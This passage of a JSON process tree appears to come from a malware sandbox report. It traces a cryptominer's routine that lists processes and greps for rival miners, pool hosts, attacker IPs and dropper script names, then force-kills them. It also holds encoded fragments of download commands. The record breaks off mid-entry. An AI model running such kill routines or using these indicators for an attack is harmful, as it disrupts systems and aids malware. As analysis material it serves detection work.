"process_name": "/bin/ps", "pid": 21853, "command_line_args": "ps auxf" }, { "process_name": "/bin/grep", "pid": 21849, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21894, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21712, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21881, "command_line_args": "grep ESTABLISHED\\|SYN_SENT" }, { "process_name": "/usr/bin/pgrep", "pid": 21889, "command_line_args": "pgrep -f xzpauectgr" }, { "process_name": "/bin/ps", "pid": 21655, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21322, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21417, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21282, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21609, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21694, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21998, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21510, "command_line_args": "grep /tmp/java" }, { "process_name": "/usr/bin/xargs", "pid": 21701, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21844, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21996, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21708, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21692, "command_line_args": "grep cr5.sh" }, { "process_name": "/bin/ps", "pid": 21376, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21986, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21350, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21368, "command_line_args": "grep zXcDajSs" }, { "process_name": "/usr/bin/awk", "pid": 21324, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21637, "command_line_args": "grep /tmp/udevd" }, { "process_name": "/usr/bin/xargs", "pid": 21624, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21715, "command_line_args": "grep luk-cpu" }, { "process_name": "/usr/bin/xargs", "pid": 21465, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21480, "command_line_args": "grep -v _" }, { "process_name": "/usr/bin/awk", "pid": 21602, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21521, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21561, "command_line_args": "grep -v dblaunch" }, { "process_name": "/usr/bin/awk", "pid": 21711, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21440, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21884, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21343, "command_line_args": "grep hahwNEdB" }, { "process_name": "/usr/bin/xargs", "pid": 21370, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21891, "command_line_args": "pgrep -f slxfbkmxtd" }, { "process_name": "/usr/bin/awk", "pid": 21279, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21383, "command_line_args": "grep AJ2AkKe" }, { "process_name": "/usr/bin/xargs", "pid": 21812, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21724, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21979, "command_line_args": "pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51Fj" }, { "process_name": "/usr/bin/awk", "pid": 21865, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21497, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21910, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21639, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21475, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21875, "command_line_args": "grep ESTABLISHED\\|SYN_SENT" }, { "process_name": "/bin/grep", "pid": 21287, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21946, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21612, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21871, "command_line_args": "xargs -I % kill", "child_processes": [ { "process_name": "/bin/kill", "pid": 21872, "command_line_args": "kill -9 3388" } ] }, { "process_name": "/usr/bin/pgrep", "pid": 21911, "command_line_args": "pgrep -f mqdsflm.cf" }, { "process_name": "/bin/grep", "pid": 21572, "command_line_args": "grep -v aux" }, { "process_name": "/bin/grep", "pid": 21770, "command_line_args": "grep curl" }, { "process_name": "/usr/bin/awk", "pid": 21294, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21400, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21340, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pkill", "pid": 22003, "command_line_args": "pkill -f biosetjenkins" }, { "process_name": "/bin/grep", "pid": 21626, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21399, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21270, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21807, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21731, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21371, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21537, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21398, "command_line_args": "grep http_0xCC031" }, { "process_name": "/bin/ps", "pid": 21625, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21930, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21500, "command_line_args": "grep -E wnTKYg|2t3ik|qW3xT.2|ddg" }, { "process_name": "/bin/ps", "pid": 21508, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21733, "command_line_args": "grep ficov" }, { "process_name": "/bin/grep", "pid": 21457, "command_line_args": "grep -v aux" }, { "process_name": "/bin/grep", "pid": 21752, "command_line_args": "grep wget" }, { "process_name": "/bin/grep", "pid": 21686, "command_line_args": "grep cr5.sh" }, { "process_name": "/usr/bin/xargs", "pid": 21470, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21378, "command_line_args": "grep AkMK4A2" }, { "process_name": "/usr/bin/awk", "pid": 21688, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21444, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21811, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21720, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21356, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21272, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21587, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21364, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21478, "command_line_args": "grep -v /" }, { "process_name": "/bin/grep", "pid": 21687, "command_line_args": "grep wget" }, { "process_name": "/bin/sed", "pid": 21877, "command_line_args": "sed -e s/\\/.*//g" }, { "process_name": "/usr/bin/awk", "pid": 21643, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21463, "command_line_args": "grep 2fhtu70teuhtoh78jc5s" }, { "process_name": "/usr/bin/xargs", "pid": 21557, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21992, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21525, "command_line_args": "grep 104.248.4.162" }, { "process_name": "/bin/grep", "pid": 21387, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21982, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21834, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21517, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21448, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21756, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21290, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21338, "command_line_args": "grep uiZvwxG8" }, { "process_name": "/usr/bin/awk", "pid": 21419, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21276, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21803, "command_line_args": "ps auxf" }, { "process_name": "/bin/grep", "pid": 21258, "command_line_args": "grep /tmp/ddg" }, { "process_name": "/usr/bin/xargs", "pid": 21335, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21659, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21734, "command_line_args": "grep curl" }, { "process_name": "/usr/bin/awk", "pid": 21676, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21868, "command_line_args": "ps auxf" }, { "process_name": "/bin/ps", "pid": 21271, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21355, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21669, "command_line_args": "grep curl" }, { "process_name": "/bin/grep", "pid": 21555, "command_line_args": "grep watchdogs" }, { "process_name": "/bin/ps", "pid": 21296, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21318, "command_line_args": "grep nMrfmnRa" }, { "process_name": "/usr/bin/awk", "pid": 21670, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21332, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21647, "command_line_args": "grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC4" }, { "process_name": "/bin/grep", "pid": 21805, "command_line_args": "grep mine.moneropool.com" }, { "process_name": "/bin/grep", "pid": 21674, "command_line_args": "grep 2mr.sh" }, { "process_name": "/usr/bin/xargs", "pid": 21410, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21800, "command_line_args": "grep 176.31.6.16" }, { "process_name": "/usr/bin/pgrep", "pid": 21921, "command_line_args": "pgrep -f ./seervceaess" }, { "process_name": "/usr/bin/pgrep", "pid": 21915, "command_line_args": "pgrep -f lower.sh" }, { "process_name": "/bin/grep", "pid": 21815, "command_line_args": "grep xmr.crypto-pool.fr:8080" }, { "process_name": "/usr/bin/xargs", "pid": 21928, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21571, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21847, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21633, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21948, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21359, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21268, "command_line_args": "grep /tmp/ppol" }, { "process_name": "/usr/bin/awk", "pid": 21284, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21487, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21577, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21798, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21442, "command_line_args": "grep 2g0uv7npuhrlatd" }, { "process_name": "/usr/bin/awk", "pid": 21831, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21311, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21603, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21578, "command_line_args": "grep sync_supers" }, { "process_name": "/bin/grep", "pid": 21845, "command_line_args": "grep xmr.crypto-pool.fr:7777" }, { "process_name": "/usr/bin/xargs", "pid": 21890, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21418, "command_line_args": "grep aziplcr72qjhzvin" }, { "process_name": "/usr/bin/awk", "pid": 21496, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21439, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21485, "command_line_args": "grep \\[^" }, { "process_name": "/bin/ps", "pid": 21833, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/awk", "pid": 21700, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21960, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21446, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21710, "command_line_args": "grep j2.conf" }, { "process_name": "/usr/bin/xargs", "pid": 21760, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21917, "command_line_args": "pgrep -f ./ppp" }, { "process_name": "/usr/bin/xargs", "pid": 21689, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21943, "command_line_args": "pgrep -f ./jiba" }, { "process_name": "/bin/ps", "pid": 21476, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21506, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21782, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21393, "command_line_args": "grep http_0xCC030" }, { "process_name": "/usr/bin/awk", "pid": 21658, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21574, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21531, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21384, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21553, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21567, "command_line_args": "grep -v kdevtmpfsi" }, { "process_name": "/bin/ps", "pid": 21823, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/pgrep", "pid": 21933, "command_line_args": "pgrep -f ./pvv" }, { "process_name": "/bin/grep", "pid": 21473, "command_line_args": "grep 44ct7udt0patws3agkdfqnjm" }, { "process_name": "/bin/grep", "pid": 21685, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21862, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21310, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21412, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21524, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21406, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21958, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21808, "command_line_args": "ps auxf" }, { "process_name": "/bin/grep", "pid": 21505, "command_line_args": "grep 158.69.133.18:8220" }, { "process_name": "/usr/bin/awk", "pid": 21374, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21796, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21725, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21275, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21931, "command_line_args": "pgrep -f ./jvs" }, { "process_name": "/bin/grep", "pid": 21662, "command_line_args": "grep mr.sh" }, { "process_name": "/bin/grep", "pid": 21451, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21547, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21492, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21971, "command_line_args": "pgrep -f 188.209.49.54" }, { "process_name": "/usr/bin/awk", "pid": 21856, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21361, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21474, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21825, "command_line_args": "grep zhuabcn@yahoo.com" }, { "process_name": "/usr/bin/pgrep", "pid": 21989, "command_line_args": "pgrep -f 65ccEJ7" }, { "process_name": "/bin/grep", "pid": 21328, "command_line_args": "grep I0r8Jyyt" }, { "process_name": "/bin/grep", "pid": 21573, "command_line_args": "grep ps" }, { "process_name": "/usr/bin/xargs", "pid": 21597, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21707, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 22000, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21702, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21261, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21381, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21317, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21788, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21607, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21416, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21895, "command_line_args": "pgrep -f addnj" }, { "process_name": "/usr/bin/awk", "pid": 21568, "command_line_args": "awk $3>80.0{print $2}" }, { "process_name": "/bin/grep", "pid": 21560, "command_line_args": "grep -v root" }, { "process_name": "/bin/ps", "pid": 21286, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21456, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21535, "command_line_args": "grep /dev/shm/z3.sh" }, { "process_name": "/usr/bin/awk", "pid": 21491, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21630, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/pgrep", "pid": 21927, "command_line_args": "pgrep -f ./servcesa" }, { "process_name": "/usr/bin/awk", "pid": 21861, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21672, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21615, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21251, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21786, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21829, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21906, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21392, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21767, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21264, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21726, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21605, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21962, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21402, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21594, "command_line_args": "grep -v aux" }, { "process_name": "/bin/ps", "pid": 21256, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21758, "command_line_args": "grep curl" }, { "process_name": "/usr/bin/awk", "pid": 21723, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21755, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21793, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21729, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21589, "command_line_args": "grep x]" }, { "process_name": "/usr/bin/xargs", "pid": 21405, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21606, "command_line_args": "grep /tmp/l.sh" }, { "process_name": "/bin/grep", "pid": 21363, "command_line_args": "grep HD7fcBgg" }, { "process_name": "/usr/bin/xargs", "pid": 21842, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21435, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21620, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21629, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21353, "command_line_args": "grep 3XEzey2T" }, { "process_name": "/usr/bin/xargs", "pid": 21918, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21507, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21414, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21747, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21926, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21893, "command_line_args": "pgrep -f mixtape" }, { "process_name": "/usr/bin/xargs", "pid": 21683, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21501, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21377, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21458, "command_line_args": "grep ]" }, { "process_name": "/bin/ps", "pid": 21713, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21690, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21433, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21291, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21369, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21787, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21666, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21814, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21461, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21423, "command_line_args": "awk { if(substr($11,1,2)==\"./\" && s" }, { "process_name": "/bin/ps", "pid": 21858, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/xargs", "pid": 21580, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21651, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21997, "command_line_args": "pgrep -f systemxlv" }, { "process_name": "/usr/bin/awk", "pid": 21546, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21920, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21988, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21887, "command_line_args": "pgrep -f L2Jpbi9iYXN" }, { "process_name": "/bin/ps", "pid": 21493, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21459, "command_line_args": "awk $3>10.0{print $2}" }, { "process_name": "/usr/bin/pgrep", "pid": 21963, "command_line_args": "pgrep -f kintegrityd_svc" }, { "process_name": "/usr/bin/awk", "pid": 21409, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21570, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21281, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21452, "command_line_args": "grep rkebbwgqpl4npmm" }, { "process_name": "/bin/ps", "pid": 21635, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21554, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21828, "command_line_args": "ps auxf" }, { "process_name": "/bin/grep", "pid": 21327, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21897, "command_line_args": "pgrep -f 200.68.17.196" }, { "process_name": "/bin/grep", "pid": 21357, "command_line_args": "grep -v grep" }, { "process_name": "/bin/ps", "pid": 21598, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21777, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21610, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21325, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21616, "command_line_args": "grep hahwNEdB" }, { "process_name": "/usr/bin/xargs", "pid": 21748, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21790, "command_line_args": "grep 144.217.45.45" }, { "process_name": "/usr/bin/awk", "pid": 21851, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21330, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21866, "command_line_args": "xargs -I % kill", "child_processes": [ { "process_name": "/bin/kill", "pid": 21867, "command_line_args": "kill -9 3383" } ] }, { "process_name": "/usr/bin/pgrep", "pid": 21901, "command_line_args": "pgrep -f KHdnZXQgLXFPLSBodHRw" }, { "process_name": "/bin/grep", "pid": 21495, "command_line_args": "grep watchd0g" }, { "process_name": "/usr/bin/pgrep", "pid": 21945, "command_line_args": "pgrep -f ./watchbog" }, { "process_name": "/bin/grep", "pid": 21403, "command_line_args": "grep http_0xCC032" }, { "process_name": "/bin/grep", "pid": 21302, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21914, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21375, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21907, "command_line_args": "pgrep -f mwyumwdbpq.conf" }, { "process_name": "/bin/grep", "pid": 21824, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21769, "command_line_args": "grep nullcrew" }, { "process_name": "/bin/grep", "pid": 21775, "command_line_args": "grep 107.174.47.156" }, { "process_name": "/bin/grep", "pid": 21472, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21427, "command_line_args": "grep /boot/vmlinuz" }, { "process_name": "/bin/grep", "pid": 21632, "command_line_args": "grep aziplcr72qjhzvin" }, { "process_name": "/usr/bin/xargs", "pid": 21671, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21391, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21494, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21953, "command_line_args": "pgrep -f kauditd_svc" }, { "process_name": "/bin/grep", "pid": 21437, "command_line_args": "grep dgqtrcst23rtdi3ldqk322j2" }, { "process_name": "/bin/grep", "pid": 21727, "command_line_args": "grep ficov" }, { "process_name": "/bin/grep", "pid": 21839, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21970, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21432, "command_line_args": "grep i4b503a52cc5" }, { "process_name": "/bin/grep", "pid": 21515, "command_line_args": "grep gitee.com" }, { "process_name": "/bin/ps", "pid": 21843, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/awk", "pid": 21821, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21691, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21680, "command_line_args": "grep 2mr.sh" }, { "process_name": "/usr/bin/pgrep", "pid": 21955, "command_line_args": "pgrep -f kpsmoused_svc" }, { "process_name": "/usr/bin/pgrep", "pid": 21957, "command_line_args": "pgrep -f kseriod_svc" }, { "process_name": "/bin/ps", "pid": 21838, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/xargs", "pid": 21260, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21780, "command_line_args": "grep 83.220.169.247" }, { "process_name": "/bin/ps", "pid": 21445, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21792, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21421, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21329, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21617, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21413, "command_line_args": "grep C4iLM4L" }, { "process_name": "/bin/grep", "pid": 21462, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21619, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21608, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21479, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/pgrep", "pid": 21885, "command_line_args": "pgrep -f monerohash" }, { "process_name": "/usr/bin/awk", "pid": 21314, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21753, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21407, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21841, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21565, "command_line_args": "grep -v apache2" }, { "process_name": "/usr/bin/pgrep", "pid": 21969, "command_line_args": "pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN" }, { "process_name": "/usr/bin/xargs", "pid": 